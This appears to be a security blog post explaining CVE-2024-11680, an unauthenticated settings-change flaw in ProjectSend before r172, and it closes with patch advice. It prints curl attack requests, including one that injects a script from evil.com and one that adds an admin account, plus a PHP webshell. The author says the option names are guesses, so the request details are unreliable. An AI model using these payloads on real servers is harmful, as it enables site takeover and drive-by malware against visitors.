Keywords: ProjectSend, CVE-2024-11680, webshell, exploit, PHP, authentication bypass, RCE
ProjectSend is a popular self-hosted PHP application for sharing files privately. In early 2024, security researchers uncovered a major vulnerability tracked as CVE-2024-11680. If you run ProjectSend before version r172, your server may be wide open to attackers.
Let's break down what this vulnerability is, how it works, and what a real-world attack might look like.
Vulnerability: Improper Authentication in ProjectSend (before r172)
- Impact: Allows unauthenticated, remote attackers to modify critical settings via crafted HTTP requests.
- Risks: Create new admin accounts, upload webshells, embed malicious JavaScript—leading to complete site takeover.
In simple terms, the flaw lets anyone change your site's config by talking directly to options.php, without needing to log in.
Why Does This Happen?
ProjectSend’s options.php file handles the site’s configuration. Older versions fail to check if the user is authenticated before applying changes. That means anyone on the Internet can just send the right kind of request and update site settings.
Here's a simplified look at the vulnerable code logic (trimmed for clarity)
<?php
// options.php in vulnerable ProjectSend versions
// ...some code
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// NO login/auth check!
$option_name = $_POST['option_name'];
$option_value = $_POST['option_value'];
update_option($option_name, $option_value);
}
?>
>Notice: There’s no check like if(user_is_authenticated()) before applying changes.
How Does The Exploit Work?
Since options.php listens for POST requests and doesn’t check for authentication, an attacker just needs to send crafted data.
Example attack using curl
curl -X POST https://target-site.com/options.php \
-d "option_name=site_url&option_value=evil.com"
But the real damage comes from tweaking more sensitive options, such as user management.
1. Create a New Admin Account
Most ProjectSend installs let admins register new accounts. By sending the right POST data, an attacker can make a new admin:
curl -X POST https://target-site.com/options.php \
-d "option_name=add_user&option_value=eviluser|evilpass|admin|evil@hacker.com"
Note: The actual option/key names may differ across installations, but you get the idea—critical stuff is up for grabs!
2. Upload a Webshell
Attackers may tweak the configuration so they can upload PHP files (webshells) using ProjectSend's upload feature, especially if file type restrictions are controlled by the vulnerable options endpoint.
Sample PHP webshell (never use malicious code for illegal purposes!)
<?php
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
?>
Once uploaded, an attacker could browse to https://target-site.com/uploads/webshell.php?cmd=ls to run commands on your server.
3. Embed Malicious JavaScript
Change settings like the site’s footer or header to include a <script> tag for a drive-by attack. For example:
curl -X POST https://target-site.com/options.php \
-d "option_name=footer_text&option_value=<script src='https://evil.com/malware.js'></script>";
References & Patch
- CVE Details: CVE-2024-11680
- ProjectSend GitHub Security Advisory
- Patch commit fixing the bug
- Original researcher writeup
Conclusion
CVE-2024-11680 is an urgent wake-up call for anyone running ProjectSend. Without proper authentication on key config scripts, attackers can own your files and web server in minutes. Patch now, review your security, and always keep self-hosted apps updated!
Stay safe!
—Your Friendly Security Writer
*For educational purposes only. Always use this knowledge responsibly. Questions? [Contact me](mailto:security@example.com).*
Timeline
Published on: 11/26/2024 10:15:04 UTC
Last modified on: 12/06/2024 18:42:17 UTC